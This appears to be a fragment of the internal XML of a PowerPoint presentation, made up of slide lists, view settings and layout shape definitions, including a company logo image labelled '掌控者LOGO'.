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1457" r:id="rId2"/>
    <p:sldId id="1394" r:id="rId3"/>
    <p:sldId id="1486" r:id="rId4"/>
    <p:sldId id="1487" r:id="rId5"/>
    <p:sldId id="1493" r:id="rId6"/>
    <p:sldId id="1502" r:id="rId7"/>
    <p:sldId id="1496" r:id="rId8"/>
    <p:sldId id="1497" r:id="rId9"/>
    <p:sldId id="1503" r:id="rId10"/>
    <p:sldId id="1498" r:id="rId11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6">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="380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yz" initials="x" lastIdx="1" clrIdx="0"/>
  <p:cmAuthor id="2" name="秦 莫天" initials="秦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FEFEF"/>
    <a:srgbClr val="A5A5A5"/>
    <a:srgbClr val="003366"/>
    <a:srgbClr val="3399FF"/>
    <a:srgbClr val="FF9900"/>
    <a:srgbClr val="5F5F5F"/>
    <a:srgbClr val="FFCC00"/>
    <a:srgbClr val="6666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86026" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="74" d="100"/>
          <a:sy n="74" d="100"/>
        </p:scale>
        <p:origin x="1042" y="67"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2006"/>
        <p:guide pos="3807"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="321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6885" y="720725"/>
            <a:ext cx="640143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7A1ED033-5F5C-4572-AE4B-7CFF71C657D2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图片 112" descr="掌控者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3835" y="1240790"/>
            <a:ext cx="1740535" cy="621665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 102"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12193201" cy="30686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" name="AutoShape 103"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3759570" y="3113088"/>
            <a:ext cx="7823970" cy="8382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6" name="Rectangle 105"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="10262610" y="1741488"/>
            <a:ext cx="71127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" name="Rectangle 106"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="9246510" y="1131888"/>
            <a:ext cx="121932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8" name="Rectangle 107"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="10770660" y="141288"/>
            <a:ext cx="1219320" cy="1524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9" name="Rectangle 108"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8738460" y="7508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" name="Rectangle 110"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8433630" y="28844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" name="Rectangle 114"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="508050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2" name="Rectangle 120"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="569016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3" name="Rectangle 124"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="599499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4" name="Rectangle 126"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="629982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15" name="Group 211"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6299820" y="1741488"/>
            <a:ext cx="1727370" cy="838200"/>
            <a:chOff x="2976" y="1440"/>
            <a:chExt cx="816" cy="528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 104"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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7" name="Rectangle 125"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976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8" name="Rectangle 127"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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9" name="Rectangle 128"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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0" name="Rectangle 129"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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1" name="Rectangle 130"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264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2" name="Rectangle 131"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264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3" name="Rectangle 132"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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4" name="Rectangle 133"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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5" name="Rectangle 134"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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6" name="Rectangle 135"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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7" name="Rectangle 136"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552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8" name="Rectangle 137"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552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9" name="Rectangle 138"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696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0" name="Rectangle 139"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696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1" name="Rectangle 140"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696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Group 212"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4470840" y="1970088"/>
            <a:ext cx="1727370" cy="609600"/>
            <a:chOff x="2112" y="1584"/>
            <a:chExt cx="816" cy="384"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 112"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400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4" name="Rectangle 113"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400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5" name="Rectangle 115"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544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6" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="172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7" name="Rectangle 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544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8" name="Rectangle 118"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688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9" name="Rectangle 119"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688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0" name="Rectangle 121"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832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1" name="Rectangle 122"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="172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2" name="Rectangle 123"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832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3" name="Rectangle 141"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256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4" name="Rectangle 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2112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45" name="Group 143"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1016100" y="3570288"/>
            <a:ext cx="2540250" cy="762000"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1680" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 144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7" name="Rectangle 145"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400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8" name="Rectangle 146"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="2207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9" name="Rectangle 147"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545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0" name="Rectangle 148"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="1920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1" name="Rectangle 149"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545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2" name="Rectangle 150"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="1776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3" name="Rectangle 151"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687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2687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5" name="Rectangle 153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6" name="Rectangle 154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7" name="Rectangle 155"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2065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8" name="Rectangle 156"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2207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9" name="Rectangle 157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0" name="Rectangle 158"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976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1" name="Rectangle 159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2" name="Rectangle 160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3" name="Rectangle 161"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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4" name="Rectangle 162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5" name="Rectangle 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264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6" name="Rectangle 164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7" name="Rectangle 165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8" name="Rectangle 166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9" name="Rectangle 167"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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0" name="Rectangle 168"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3553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1" name="Rectangle 169"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3553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2" name="Rectangle 170"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695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3" name="Rectangle 171"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695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4" name="Rectangle 172"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695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5" name="Rectangle 173"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256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6" name="Rectangle 174"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2112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77" name="Group 175"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315920" y="827088"/>
            <a:ext cx="3556350" cy="1066800"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1680" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="Rectangle 176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9" name="Rectangle 177"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400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0" name="Rectangle 178"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400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1" name="Rectangle 179"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544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2" name="Rectangle 180"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="192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3" name="Rectangle 181"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544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4" name="Rectangle 182"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688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5" name="Rectangle 183"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688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6" name="Rectangle 184"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688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7" name="Rectangle 185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8" name="Rectangle 186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9" name="Rectangle 187"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832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0" name="Rectangle 188"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832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1" name="Rectangle 189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2" name="Rectangle 190"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976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3" name="Rectangle 191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4" name="Rectangle 192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5" name="Rectangle 193"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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6" name="Rectangle 194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7" name="Rectangle 195"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264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8" name="Rectangle 196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9" name="Rectangle 197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0" name="Rectangle 198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1" name="Rectangle 199"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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2" name="Rectangle 200"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552" y="16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" name="Rectangle 201"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552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" name="Rectangle 202"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696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" name="Rectangle 203"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696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" name="Rectangle 204"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696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7" name="Rectangle 205"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256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8" name="Rectangle 206"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2112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109" name="AutoShape 207"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="711270" y="2655888"/>
            <a:ext cx="10262610" cy="8382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0" name="Rectangle 208"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2743470" y="42560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1" name="Rectangle 209"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2337030" y="4789488"/>
            <a:ext cx="304830" cy="2286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2" name="Rectangle 210"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2032200" y="4941888"/>
            <a:ext cx="40644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2540" y="2732088"/>
            <a:ext cx="8840070" cy="685800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9570" y="3494088"/>
            <a:ext cx="751914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18" name="图片 117" descr="掌控者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8865" y="1437005"/>
            <a:ext cx="3223895" cy="12636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449" y="355600"/>
            <a:ext cx="8685538" cy="487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0E65E-9137-4309-8D78-B392A1917D52}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="118" name="图片 117" descr="掌控者LOGO"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect r="74718" b="16204"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="558800" y="163830"/>
            <a:ext cx="669925" cy="8712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B4DC4-41B9-4E61-AD6F-4DDEA2B4591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Grp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3519470" y="-2"/>
            <a:ext cx="8673163" cy="4336356"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8672711"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 4336356"/>
              <a:gd name="connsiteX1" fmla="*/ 8672711 w 8672711"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 4336356"/>
              <a:gd name="connsiteX2" fmla="*/ 4336356 w 8672711"/>
              <a:gd name="connsiteY2" fmla="*/ 4336356 h 433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2711" h="4336356">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8672711" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4336356" y="43363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8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="10681752" y="0"/>
            <a:ext cx="1511449" cy="10445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27" name="Rectangle 119"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="10679636" cy="1044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1028" name="Group 120"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9170303" y="152400"/>
            <a:ext cx="2540250" cy="762000"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1680" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1037" name="Rectangle 121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8" name="Rectangle 122"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400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9" name="Rectangle 123"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="2207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0" name="Rectangle 124"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
